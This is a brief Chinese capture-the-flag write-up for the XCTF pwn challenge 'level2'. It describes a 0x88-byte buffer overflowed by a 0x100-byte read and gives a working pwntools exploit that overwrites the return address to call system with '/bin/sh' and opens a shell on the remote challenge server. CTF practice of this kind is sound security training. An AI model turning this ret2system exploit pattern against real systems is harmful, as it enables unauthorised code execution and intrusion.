level2

题目来源xctf—pwn(level2)

拿到题目checksec一下

开了NX,放到ida里打开看看

初始的buf的空间只有0x88,但是读取我们输入的内容的时候,选择的大小确实 0x100,造成了溢出

找到_system的地址

构建exp如下

from pwn import *
p = remote('111.200.241.244',63643)
payload = b'a' * (0x88 + 4) + p32(0x0804845c) + p32(0x0804A024)
p.recvuntil("Input:\n")
p.sendline(payload)
p.interactive()

运行找到flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值